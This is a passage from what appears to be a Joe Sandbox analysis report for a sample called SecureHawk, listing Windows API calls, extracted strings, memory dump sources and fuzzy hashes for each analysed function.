                                  • LoadCursorW.USER32(00000000,00007F89), ref: 00365568
                                  • GetCursorInfo.USER32(?), ref: 00365578
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Cursor$Load$Info
                                  • String ID:
                                  • API String ID: 2577412497-0
                                  • Opcode ID: 4a4925ea605c75da4e28cda37b501a9dbefb0ca4a9dbf20080d9534854463763
                                  • Instruction ID: 036376bed34bdcc4f78065c5d56db31e2f2563620eb200757b0765580084dbc3
                                  • Opcode Fuzzy Hash: 4a4925ea605c75da4e28cda37b501a9dbefb0ca4a9dbf20080d9534854463763
                                  • Instruction Fuzzy Hash: 7F31F2B0D4831A6ADB119FB68C8996EBFE9FF04750F50453AA60DE7280DB78A5048F91
                                  APIs
                                  • _memset.LIBCMT ref: 0037A646
                                  • DestroyWindow.USER32(00000000,?), ref: 0037A6C0
                                    • Part of subcall function 00301821: _memmove.LIBCMT ref: 0030185B
                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0037A73A
                                  • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0037A75C
                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0037A76F
                                  • DestroyWindow.USER32(00000000), ref: 0037A791
                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,002F0000,00000000), ref: 0037A7C8
                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0037A7E1
                                  • GetDesktopWindow.USER32 ref: 0037A7FA
                                  • GetWindowRect.USER32(00000000), ref: 0037A801
                                  • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0037A819
                                  • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0037A831
                                    • Part of subcall function 002F29AB: GetWindowLongW.USER32(?,000000EB), ref: 002F29BC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                  • String ID: 0$tooltips_class32
                                  • API String ID: 1297703922-3619404913
                                  • Opcode ID: 658ca321c5e4691b270c95f331438f84b1573ad39d1aa3f20607c903dde473b4
                                  • Instruction ID: a461a00e5bb2fc615b910f31bbc91049f0f6e2b2e8324122bb1211bffd739063
                                  • Opcode Fuzzy Hash: 658ca321c5e4691b270c95f331438f84b1573ad39d1aa3f20607c903dde473b4
                                  • Instruction Fuzzy Hash: 9A718771140745AFD726CF28CC49FAA7BE9FBC8304F04861DF989872A1D778A916CB52
                                  APIs
                                  • VariantInit.OLEAUT32(00000000), ref: 00358187
                                  • VariantCopy.OLEAUT32(00000000,?), ref: 00358190
                                  • VariantClear.OLEAUT32(00000000), ref: 0035819C
                                  • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0035828A
                                  • __swprintf.LIBCMT ref: 003582BA
                                  • VarR8FromDec.OLEAUT32(?,?), ref: 003582E6
                                  • VariantInit.OLEAUT32(?), ref: 00358397
                                  • SysFreeString.OLEAUT32(?), ref: 0035842B
                                  • VariantClear.OLEAUT32(?), ref: 00358485
                                  • VariantClear.OLEAUT32(?), ref: 00358494
                                  • VariantInit.OLEAUT32(00000000), ref: 003584D2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                  • String ID: %4d%02d%02d%02d%02d%02d$Default
                                  • API String ID: 3730832054-3931177956
                                  • Opcode ID: 014b0808ac4c1fff5e7b53f55737086beed7d0de39834a5638fb3bbe86f24e36
                                  • Instruction ID: 1c795733181ddfa1198b575fd4e2dfc1b26726c7c93e2d7cd17d65eb6ab23704
                                  • Opcode Fuzzy Hash: 014b0808ac4c1fff5e7b53f55737086beed7d0de39834a5638fb3bbe86f24e36
                                  • Instruction Fuzzy Hash: 73D11170600A16DBDB269F66C845FB9B7B8BF04742F108455EC04BF6A0CF70AD49DBA0
                                  APIs
                                  • CharUpperBuffW.USER32(?,?), ref: 00374829
                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00374874
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: BuffCharMessageSendUpper
                                  • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                  • API String ID: 3974292440-4258414348
                                  • Opcode ID: 7d323165e3b16f9a64734282d9670d731ac00d631a07371bed86bca50ffb493b
                                  • Instruction ID: 95215956b849c3fa5af130b95f42a0f926808154d09efbe8514c593358ea02a8
                                  • Opcode Fuzzy Hash: 7d323165e3b16f9a64734282d9670d731ac00d631a07371bed86bca50ffb493b
                                  • Instruction Fuzzy Hash: EF918F342007019FCB1AEF10C451A7AB7A5AF95354F00896CF8AA5F7A2CB75FD49CB82
                                  APIs
                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0037BCA1
                                  • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,003795AF), ref: 0037BCFD
                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0037BD36
                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0037BD79
                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0037BDB0
                                  • FreeLibrary.KERNEL32(?), ref: 0037BDBC
                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0037BDCC
                                  • DestroyIcon.USER32(?,?,?,?,?,003795AF), ref: 0037BDDB
                                  • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0037BDF8
                                  • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0037BE04
                                    • Part of subcall function 0031305F: __wcsicmp_l.LIBCMT ref: 003130E8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                  • String ID: .dll$.exe$.icl
                                  • API String ID: 1212759294-1154884017
                                  • Opcode ID: d9670a3fcb704e55e0dffae2bc97acebf0da26fa271e0ccc989eed65a27a892b
                                  • Instruction ID: 473ed760e986a70a65788202228f6c6b3d6c4f26cc588bc32db4d110e8af456d
                                  • Opcode Fuzzy Hash: d9670a3fcb704e55e0dffae2bc97acebf0da26fa271e0ccc989eed65a27a892b
                                  • Instruction Fuzzy Hash: AD61C171500615FEEB2ADF64CC45BBAB7BCEF08710F108145F919D60D1DBB8AA94CBA0
                                  APIs
                                    • Part of subcall function 002F1F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,002F2412,?,00000000,?,?,?,?,002F1AA7,00000000,?), ref: 002F1F76
                                  • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 002F24AF
                                  • KillTimer.USER32(-00000001,?,?,?,?,002F1AA7,00000000,?,?,002F1EBE,?,?), ref: 002F254A
                                  • DestroyAcceleratorTable.USER32(00000000), ref: 0032BF17
                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,002F1AA7,00000000,?,?,002F1EBE,?,?), ref: 0032BF48
                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,002F1AA7,00000000,?,?,002F1EBE,?,?), ref: 0032BF5F
                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,002F1AA7,00000000,?,?,002F1EBE,?,?), ref: 0032BF7B
                                  • DeleteObject.GDI32(00000000), ref: 0032BF8D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                  • String ID: h8
                                  • API String ID: 641708696-1078280285
                                  • Opcode ID: 478719b3141fa0088189fe8fec404bbb9b95b3226138700824f1508dcbd6477a
                                  • Instruction ID: e0c0b8aaa2d4ae2c44d0147ea3b5e52b0a06afc7dcf61443ecc50d00a458deff
                                  • Opcode Fuzzy Hash: 478719b3141fa0088189fe8fec404bbb9b95b3226138700824f1508dcbd6477a
                                  • Instruction Fuzzy Hash: B261D031120719DFDB2A9F14DD4AB3AF7B5FF4135AF108628E24296960C7B8A8A4CF50
                                  APIs
                                  • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 0035A12F
                                    • Part of subcall function 00301A36: _memmove.LIBCMT ref: 00301A77
                                  • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 0035A150
                                  • __swprintf.LIBCMT ref: 0035A1A9
                                  • __swprintf.LIBCMT ref: 0035A1C2
                                  • _wprintf.LIBCMT ref: 0035A269
                                  • _wprintf.LIBCMT ref: 0035A287
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: LoadString__swprintf_wprintf$_memmove
                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                  • API String ID: 311963372-3080491070
                                  • Opcode ID: 042d57fe944b2dda87aedf7880d0188676577687f12b410f09592ca2ea68248a
                                  • Instruction ID: 02e06e1f7ae03dc71985daac9546f97a544eba96d029432457f96ebf75ecb3d8
                                  • Opcode Fuzzy Hash: 042d57fe944b2dda87aedf7880d0188676577687f12b410f09592ca2ea68248a
                                  • Instruction Fuzzy Hash: 09519F71941209AADF17EBE0CD52EEEB778EF04341F100665F905B60A2EB352F58DB61
                                  APIs
                                    • Part of subcall function 002F4D37: __itow.LIBCMT ref: 002F4D62
                                    • Part of subcall function 002F4D37: __swprintf.LIBCMT ref: 002F4DAC
                                  • CharLowerBuffW.USER32(?,?), ref: 0035A87B
                                  • GetDriveTypeW.KERNEL32 ref: 0035A8C8
                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0035A910
                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0035A947
                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0035A975
                                    • Part of subcall function 00301821: _memmove.LIBCMT ref: 0030185B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                  • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                  • API String ID: 2698844021-4113822522
                                  • Opcode ID: 398c4d14e7b91706a3cd333820eb86af61f78c7123f86a9c52be12cf4b9e2165
                                  • Instruction ID: 222eddde20e589243d5958fe14cb14bf288b282ac126c3a352b49fb2b1bce07f
                                  • Opcode Fuzzy Hash: 398c4d14e7b91706a3cd333820eb86af61f78c7123f86a9c52be12cf4b9e2165
                                  • Instruction Fuzzy Hash: 9C514C711047059FC706EF10C89196BB7E8FF88758F10896DF8969B2A1DB71AE09CB92
                                  APIs
                                  • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0035A6BF
                                  • __swprintf.LIBCMT ref: 0035A6E1
                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 0035A71E
                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0035A743
                                  • _memset.LIBCMT ref: 0035A762
                                  • _wcsncpy.LIBCMT ref: 0035A79E
                                  • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0035A7D3
                                  • CloseHandle.KERNEL32(00000000), ref: 0035A7DE
                                  • RemoveDirectoryW.KERNEL32(?), ref: 0035A7E7
                                  • CloseHandle.KERNEL32(00000000), ref: 0035A7F1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                  • String ID: :$\$\??\%s
                                  • API String ID: 2733774712-3457252023
                                  • Opcode ID: 7bc6020dcdff5f024d5e0929819c2c28c5783c5d5ecf862fc022f93bf4b68d1f
                                  • Instruction ID: 08624ed2cada23f522858b73c690ab8035285d224f18fbb73f27458479734d92
                                  • Opcode Fuzzy Hash: 7bc6020dcdff5f024d5e0929819c2c28c5783c5d5ecf862fc022f93bf4b68d1f
                                  • Instruction Fuzzy Hash: 1A31A37150024AABDB229FA0DC49FEB77BCEF8C701F1041A6F919D6160E77097898B25
                                  APIs
                                    • Part of subcall function 002F29E2: GetWindowLongW.USER32(?,000000EB), ref: 002F29F3
                                  • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0037C61F
                                  • GetFocus.USER32 ref: 0037C62F
                                  • GetDlgCtrlID.USER32(00000000), ref: 0037C63A
                                  • _memset.LIBCMT ref: 0037C765
                                  • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0037C790
                                  • GetMenuItemCount.USER32(?), ref: 0037C7B0
                                  • GetMenuItemID.USER32(?,00000000), ref: 0037C7C3
                                  • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0037C7F7
                                  • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0037C83F
                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0037C877
                                  • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0037C8AC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                  • String ID: 0
                                  • API String ID: 1296962147-4108050209
                                  • Opcode ID: 63620afa87afad3da8d021a52d24e46e01babee270228a723d94cbc3da2088bd
                                  • Instruction ID: b20f1cf978ab7518e1587d6a875b0dd843ced90c7c0d23aec3fcaff513664f9c
                                  • Opcode Fuzzy Hash: 63620afa87afad3da8d021a52d24e46e01babee270228a723d94cbc3da2088bd
                                  • Instruction Fuzzy Hash: 0C81F270218341AFD726CF14C885A6BBBE8FF88314F04992EF99997291D734D805CFA2
                                  APIs
                                    • Part of subcall function 00348C03: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00348C1F
                                    • Part of subcall function 00348C03: GetLastError.KERNEL32(?,003486E3,?,?,?), ref: 00348C29
                                    • Part of subcall function 00348C03: GetProcessHeap.KERNEL32(00000008,?,?,003486E3,?,?,?), ref: 00348C38
                                    • Part of subcall function 00348C03: HeapAlloc.KERNEL32(00000000,?,003486E3,?,?,?), ref: 00348C3F
                                    • Part of subcall function 00348C03: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00348C56
                                    • Part of subcall function 00348CA0: GetProcessHeap.KERNEL32(00000008,003486F9,00000000,00000000,?,003486F9,?), ref: 00348CAC
                                    • Part of subcall function 00348CA0: HeapAlloc.KERNEL32(00000000,?,003486F9,?), ref: 00348CB3
                                    • Part of subcall function 00348CA0: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,003486F9,?), ref: 00348CC4
                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00348911
                                  • _memset.LIBCMT ref: 00348926
                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00348945
                                  • GetLengthSid.ADVAPI32(?), ref: 00348956
                                  • GetAce.ADVAPI32(?,00000000,?), ref: 00348993
                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 003489AF
                                  • GetLengthSid.ADVAPI32(?), ref: 003489CC
                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 003489DB
                                  • HeapAlloc.KERNEL32(00000000), ref: 003489E2
                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00348A03
                                  • CopySid.ADVAPI32(00000000), ref: 00348A0A
                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00348A3B
                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00348A61
                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00348A75
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                  • String ID:
                                  • API String ID: 3996160137-0
                                  • Opcode ID: 3f850066025a3cc706e970096396b6d26d7f0058badd53b23ee06f8e1b84ff8f
                                  • Instruction ID: 23df697d0bdc2ccd77426b32a7410f75afa3782207c92a75c52009855015708c
                                  • Opcode Fuzzy Hash: 3f850066025a3cc706e970096396b6d26d7f0058badd53b23ee06f8e1b84ff8f
                                  • Instruction Fuzzy Hash: 98614FB1900209AFDF06DF95DC45EEEBBB9FF04300F04855AF915AB290DB75AA15CB60
                                  APIs
                                  • GetDC.USER32(00000000), ref: 0036783E
                                  • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0036784A
                                  • CreateCompatibleDC.GDI32(?), ref: 00367856
                                  • SelectObject.GDI32(00000000,?), ref: 00367863
                                  • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 003678B7
                                  • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 003678F3
                                  • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00367917
                                  • SelectObject.GDI32(00000006,?), ref: 0036791F
                                  • DeleteObject.GDI32(?), ref: 00367928
                                  • DeleteDC.GDI32(00000006), ref: 0036792F
                                  • ReleaseDC.USER32(00000000,?), ref: 0036793A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                  • String ID: (
                                  • API String ID: 2598888154-3887548279
                                  • Opcode ID: b60081420a0b3515fc6f0245d26b90cb57dc0530ec23bf7afc4b83eea1bc0d0d
                                  • Instruction ID: 83da6ee69c920adc776279776fc5d571785539e5d038f5f55726fcd9e3fedfdc
                                  • Opcode Fuzzy Hash: b60081420a0b3515fc6f0245d26b90cb57dc0530ec23bf7afc4b83eea1bc0d0d
                                  • Instruction Fuzzy Hash: D8513B71904309AFCB1ACFA8CC89EAEBBB9EF48310F14855DF959A7250D731A945CB50
                                  APIs
                                  • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 0035A341
                                    • Part of subcall function 00301A36: _memmove.LIBCMT ref: 00301A77
                                  • LoadStringW.USER32(?,?,00000FFF,?), ref: 0035A363
                                  • __swprintf.LIBCMT ref: 0035A3BC
                                  • __swprintf.LIBCMT ref: 0035A3D5
                                  • _wprintf.LIBCMT ref: 0035A48B
                                  • _wprintf.LIBCMT ref: 0035A4A9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: LoadString__swprintf_wprintf$_memmove
                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                  • API String ID: 311963372-2391861430
                                  • Opcode ID: 33c1ca2d6aaf32f6b18c6e5be685da6885ad52d0e665dcff9d824c621217e31f
                                  • Instruction ID: 1c200d445f70004e7979199a9453000243e9f7b4eddd806d6cbf0eaa739ad52e
                                  • Opcode Fuzzy Hash: 33c1ca2d6aaf32f6b18c6e5be685da6885ad52d0e665dcff9d824c621217e31f
                                  • Instruction Fuzzy Hash: 8351DF71901109AADF17EBE0CDA6EEEB778EF04340F100265F905B61A2EB316F58DB61
                                  APIs
                                    • Part of subcall function 00359387: __time64.LIBCMT ref: 00359391
                                    • Part of subcall function 00304A8C: _fseek.LIBCMT ref: 00304AA4
                                  • __wsplitpath.LIBCMT ref: 0035965C
                                    • Part of subcall function 0031424E: __wsplitpath_helper.LIBCMT ref: 0031428E
                                  • _wcscpy.LIBCMT ref: 0035966F
